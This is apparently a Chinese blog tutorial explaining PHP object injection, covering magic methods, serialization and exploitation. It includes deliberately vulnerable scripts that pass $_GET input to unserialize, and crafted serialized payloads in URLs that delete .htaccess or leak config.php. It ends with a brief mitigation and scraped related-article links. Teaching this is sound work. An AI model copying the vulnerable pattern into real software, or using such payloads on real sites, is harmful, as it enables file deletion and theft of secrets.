深入理解PHP对象注入
0x00 背景
php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险,为了理解这个漏洞,请读者具备基础的php知识。
0x01 漏洞案例
如果你觉得这是个渣渣洞,那么请看一眼这个列表,一些被审计狗挖到过该漏洞的系统,你可以发现都是一些耳熟能详的玩意(就国外来说)
除此之外等等一堆系统,八成可能大概在这些还有其他的php程序中还有很多这种类型的漏洞,所以不妨考虑坐下喝杯咖啡并且试着去理解这篇文章。
0x01 PHP类和对象
类和变量是非常容易理解的php概念,打个比方,下面的代码在一个类中定义了一个变量和一个方法。
<?php class TestClass
{
// A variable public $variable = 'This is a string'; // A simple method public function PrintVariable()
{
echo $this->variable;
}
} // Create an object $object = new TestClass(); // Call a method $object->PrintVariable(); ?>
它创建了一个对象并且调用了 PrintVariable 函数,该函数会输出变量 variable。
如果想了解更多关于php面向对象编程的知识 请点: http://php.net/manual/zh/language.oop5.php
0x02 php magic方法
php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号“__”开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。
这些函数在某些情况下会自动调用,比如:
__construct 当一个对象创建时调用 (constructor) __destruct 当一个对象被销毁时调用 (destructor) __ toString当一个对象被当作一个字符串使用
为了更好的理解magic方法是如何工作的,让我们添加一个magic方法在我们的类中。
<?php
class TestClass
{
// 一个变量public $variable = 'This is a string';// 一个简单的方法 public function PrintVariable()
{
echo $this->variable . '<br />';
} // Constructor public function __construct()
{
echo '__construct <br />';
} // Destructor public function __destruct()
{
echo '__destruct <br />';
} // Call public function __toString()
{
return '__toString<br />';
}
} // 创建一个对象
// __construct会被调用 $object = new TestClass(); // 创建一个方法
// 'This is a string’ 这玩意会被输出 $object->PrintVariable(); // 对象被当作一个字符串
// __toString 会被调用 echo $object; // End of PHP script
// php脚本要结束了, __destruct会被调用 ?>
我们往里头放了三个 magic方法,__construct, __destruct和 __toString,你可以看出来,__construct在对象创建时调用, __destruct在php脚本结束时调用,__toString在对象被当作一个字符串使用时调用。
这个脚本会输出这狗样:
__construct
This is a string
__toString
__destruct
这只是一个简单的例子,如果你想了解更多有关magic函数的例子,请点击链接
0x03 php对象序列化
php允许保存一个对象方便以后重用,这个过程被称为序列化,打个比方,你可以保存一个包含着用户信息的对象方便等等重用。
为了序列化一个对象,你需要调用 “serialize”函数,函数会返回一个字符串,当你需要用到这个对象的时候可以使用“unserialize”去重建对象。
让我们在序列化丢进那个例子,看看序列化张什么样。
<?php
// 某类class User
{
// 类数据public $age = 0;
public $name = ''; // 输出数据 public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age
. ' years old. <br />';
}
} // 创建一个对象 $usr = new User(); // 设置数据 $usr->age = 20;
$usr->name = 'John'; // 输出数据 $usr->PrintData(); // 输出序列化之后的数据 echo serialize($usr); ?>
它会输出
User John is 20 years old.
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
你可以看到序列化之后的数据中 有 20和John,其中没有任何跟类有关的东西,只有其中的数据被数据化。
为了使用这个对象,我们用unserialize重建对象。
<?php// 某类class User
{
// Class datapublic $age = 0;
public $name = ''; // Print data public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
} // 重建对象 $usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}'); // 调用PrintData 输出数据 $usr->PrintData(); ?>
着会输出
User John is 20 years old
0x04 序列化magic函数
magic函数constructor (__construct)和 destructor (__destruct) 是会在对象创建或者销毁时自动调用,其他的一些magic函数会在serialize 或者 unserialize的时候被调用。
__sleep magic方法在一个对象被序列化的时候调用。 __wakeup magic方法在一个对象被反序列化的时候调用。
注意 __sleep 必须返回一个数组与序列化的变量名。
<?php
class Test
{
public $variable = 'BUZZ';
public $variable2 = 'OTHER';public function PrintVariable()
{
echo $this->variable . '<br />';
}public function __construct()
{
echo '__construct<br />';
} public function __destruct()
{
echo '__destruct<br />';
} public function __wakeup()
{
echo '__wakeup<br />';
} public function __sleep()
{
echo '__sleep<br />'; return array('variable', 'variable2');
}
} // 创建一个对象,会调用 __construct $obj = new Test(); // 序列化一个对象,会调用 __sleep $serialized = serialize($obj); //输出序列化后的字符串 print 'Serialized: ' . $serialized . <br />'; // 重建对象,会调用 __wakeup $obj2 = unserialize($serialized); //调用 PintVariable, 会输出数据 (BUZZ) $obj2->PrintVariable(); // php脚本结束,会调用 __destruct ?>
这玩意会输出:
__construct
__sleep
Serialized: O:4:"Test":2:
{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";}
__wakeup
BUZZ
__destruct
__destruct
你可以看到,我们创建了一个对象,序列化了它(然后__sleep被调用),之后用序列化对象重建后的对象创建了另一个对象,接着php脚本结束的时候两个对象的__destruct都会被调用。
更多相关的内容
0x05 php对象注入
现在我们理解了序列化是如何工作的,我们该如何利用它?事实上,利用这玩意的可能性有很多种,关键取决于应用程序的流程与,可用的类,与magic函数。
记住序列化对象的值是可控的。
你可能会找到一套web程序的源代码,其中某个类的__wakeup 或者 __destruct and其他乱七八糟的函数会影响到web程序。
打个比方,我们可能会找到一个类用于临时将日志储存进某个文件,当__destruct被调用时,日志文件会被删除。然后代码张这狗样。
public function LogData($text) { echo 'Log some data: ' . $text . '<br />'; file_put_contents($this->filename, $text, FILE_APPEND); } // Destructor 删除日志文件 public function __destruct() { echo '__destruct deletes "' . $this->filename . '" file. <br />'; unlink(dirname(__FILE__) . '/' . $this->filename); } } ?>
某例子关于如何使用这个类
<?php
include 'logfile.php';// 创建一个对象$obj = new LogFile(); // 设置文件名和要储存的日志数据 $obj->filename = 'somefile.log';
$obj->LogData('Test'); // php脚本结束啦,__destruct被调用,somefile.log文件被删除。 ?>
在其他的脚本,我们可能又恰好找到一个调用“unserialize”函数的,并且恰好变量是用户可控的,又恰好是$_GET之类的什么玩意的。
<?php
include 'logfile.php';// ... 一些狗日的代码和 LogFile 类 ...// 简单的类定义 class User
{
// 类数据 public $age = 0;
public $name = ''; // 输出数据 public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
} // 重建 用户输入的 数据 $usr = unserialize($_GET['usr_serialized']); ?>
你看,这个代码调用了 “LogClass” 类,并且有一个 “unserialize” 值是我们可以注入的。
所以构造类似这样的东西:
script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
究竟发生了什么呢,因为输入是可控的,所以我们可以构造任意的序列化对象,比如:
<?php$obj = new LogFile();
$obj->filename = '.htaccess';echo serialize($obj) . '<br />';?>
这个会输出
O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}
__destruct deletes ".htaccess" file.
现在我们将构造过后的序列化对象发送给刚才的脚本:
script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}
这会输出
__destruct deletes ".htaccess" file.
现在 .htaccess 已经被干掉了,因为脚本结束时 __destruct会被调用。不过我们已经可以控制“LogFile”类的变量啦。
这就是漏洞名称的由来:变量可控并且进行了unserialize操作的地方注入序列化对象,实现代码执行或者其他坑爹的行为。
虽然这不是一个很好的例子,不过我相信你可以理解这个概念,unserialize自动调用 __wakeup 和 __destruct,接着攻击者可以控制类变量,并且攻击web程序。
0x06 常见的注入点
先不谈 __wakeup 和 __destruct,还有一些很常见的注入点允许你利用这个类型的漏洞,一切都是取决于程序逻辑。
打个比方,某用户类定义了一个__toString为了让应用程序能够将类作为一个字符串输出(echo $obj) ,而且其他类也可能定义了一个类允许__toString读取某个文件。
<?php
// … 一些include ...class FileClass
{
// 文件名public $filename = 'error.log'; //当对象被作为一个字符串会读取这个文件 public function __toString()
{
return file_get_contents($this->filename);
}
} // Main User class class User
{
// Class data public $age = 0;
public $name = ''; // 允许对象作为一个字符串输出上面的data public function __toString()
{
return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
} // 用户可控 $obj = unserialize($_GET['usr_serialized']); // 输出 __toString echo $obj; ?>
so,我们构造url
script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
再想想,如果我们用序列化调用 FileClass呢
我们创建利用代码
<?php$fileobj = new FileClass();
$fileobj->filename = 'config.php';echo serialize($fileobj);?>
接着用生成的exp注入url
script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}
接着网页会输出 config.php的源代码
<?php$private_data = 'MAGIC';?>
ps:我希望这让你能够理解。
0x07 其他的利用方法
可能其他的一些magic函数海存在利用点:比如__call 会在对象调用不存在的函数时调用,__get 和 __set会在对象尝试访问一些不存在的类,变量等等时调用。
不过需要注意的是,利用场景不限于magic函数,也有一些方式可以在一半的函数中利用这个漏洞,打个比方,一个模块可能定义了一个叫get的函数进行一些敏感的操作,比如访问数据库,这就可能造成sql注入,取决于函数本身的操作。
唯一的一个技术难点在于,注入的类必须在注入点所在的地方,不过一些模块或者脚本会使用“autoload”的功能,具体可以在这里了解
0x08 如何利用或者避免这个漏洞
别在任何用户可控的地方使用“unserialize”,可以考虑“json_decode“
0x09 结论
虽然很难找到而且很难利用,但是这真的真的很严重,可以导致各种各样的漏洞。
深入理解PHP对象注入的更多相关文章
- Codeigniter 利用加密Key(密钥)的对象注入漏洞
http://drops.wooyun.org/papers/1449 原文链接:http://www.mehmetince.net/codeigniter-object-injection-vuln ...
- PHP字符逃逸导致的对象注入
1.漏洞产生原因: 序列化的字符串在经过过滤函数不正确的处理而导致对象注入,目前看到都是因为过滤函数放在了serialize函数之后,要是放在序列化之前应该就不会产生这个问题 ?php functio ...
- PHP反序列化中过滤函数使用不当导致的对象注入
1.漏洞产生的原因 #### 正常的反序列化语句是这样的 $a='a:2:{s:8:"username";s:7:"dimpl3s";s:8:"pa ...
- 理解 PHP 依赖注入 和 控制反转
理解 PHP 依赖注入 和 控制反转 要想理解 PHP 依赖注入 和 控制反转 两个概念,就必须搞清楚如下的两个问题: DI -- Dependency Injection 依赖注入 IoC -- ...
- joomla \libraries\joomla\session\session.php 反序列化截断畸形字符串导致对象注入漏洞
catalog . 漏洞描述 . PHP SESSION持久化 . PHP 序列化/反序列化内核实现 . 漏洞代码分析 . POC构造技巧 . 防御方案 . Code Pathc方案 1. 漏洞描述 ...
- struts2将servlet对象注入到Action中
在struts2框架中,可以通过IoC方式将servlet对象注入到Action中,通常需要Action实现以下接口: a. ServletRequestAware: 实现该接口的Action可以直接 ...
- 彻底理解Promise对象——用es5语法实现一个自己的Promise(上篇)
本文同步自我的个人博客: http://mly-zju.github.io/ 众所周知javascript语言的一大特色就是异步,这既是它的优点,同时在某些情况下也带来了一些的问题.最大的问题之一,就 ...
- 理解javascript 对象,原型对象、闭包
javascript作为一个面向对象的语言,理解 对象.原型.闭包.模块模式等技术点对于成为一名合格的javascript程序员相当重要,多年没写过blog,今天就先拋个玉,在下基本也不做前端,但颇感 ...
- js对象详解(JavaScript对象深度剖析,深度理解js对象)
js对象详解(JavaScript对象深度剖析,深度理解js对象) 这算是酝酿很久的一篇文章了. JavaScript作为一个基于对象(没有类的概念)的语言,从入门到精通到放弃一直会被对象这个问题围绕 ...
随机推荐
- 【算法系列学习三】[kuangbin带你飞]专题二 搜索进阶 之 A-Eight 反向bfs打表和康拓展开
[kuangbin带你飞]专题二 搜索进阶 之 A-Eight 这是一道经典的八数码问题.首先,简单介绍一下八数码问题: 八数码问题也称为九宫问题.在3×3的棋盘,摆有八个棋子,每个棋子上标有1至8的 ...
- 关于 vue.js 运行环境的搭建(mac)
由于本人使用的是mac系统,因此在vue.js 的环境搭建上遇到许许多多的坑.感谢 showonne.yubang 技术指导,最终成功解决.下面是个人的搭建过程,权当是做个笔记吧. 由于mac非常人性 ...
- unity游戏设计之背包系统
这次任务是模仿上图的样子,制作一个类似的背包系统. 上面的链接为:http://www.tasharen.com/ngui/exampleX.html 我们的目标是: 1.实现背包系统的UI界面 2. ...
- VirtulBox虚拟机搭建Linux Centos系统
简要说明 该文章目的是基于搭建hadoop的前置文章,当然也可以搭建Linux的入门文章.那我再重复一下安装准备软件. 环境准备:http://pan.baidu.com/s/1dFrHyxV 密码 ...
- 在Centos7 更改Docker默认镜像和容器的位置
图片出处:https://bobcares.com/wp-content/uploads/docker-change-directory.jpg 一.Why? 通常,当你开始使用docker时,我们并 ...
- Maven学习-Profile详解
Profile能让你为一个特殊的环境自定义一个特殊的构建:profile使得不同环境间构建的可移植性成为可能.Maven中的profile是一组可选的配置,可以用来设置或者覆盖配置默认值.有了prof ...
- CountDownLacth详解
一个同步辅助类,在完成一组正在其他线程中执行的操作之前,它允许一个或多个线程一直等待. 用给定的计数 初始化 CounDownLatch.由于调用了countDown() 方法,所以在当前计数到达零之 ...
- jqPaginator 项目中做分页的应用技巧
最近做后台管理系统,分页用到的不少,项目中其实已经有分页功能的组件但是不够高度自定义,于是就找到了 jqPaginator 高度自定义的Html结构 初始化引用如下: $("#paginat ...
- docker安装hadoop集群
docker安装hadoop集群?图啥呢?不图啥,就是图好玩.本篇博客主要是来教大家如何搭建一个docker的hadoop集群.不要问 为什么我要做这么无聊的事情,答案你也许知道,因为没有女票.... ...
- .net数据统计系统设计(中小型)
近一年多没在博客园写东西了,从换公司后就一直努力学习公司的框架和业务.而今接手一个电商数据统计项目,在博客园搜索统计项目解决方案却一无所获,最终自己设计并在开发的过程中持续更新,希望可以和大家一起交流 ...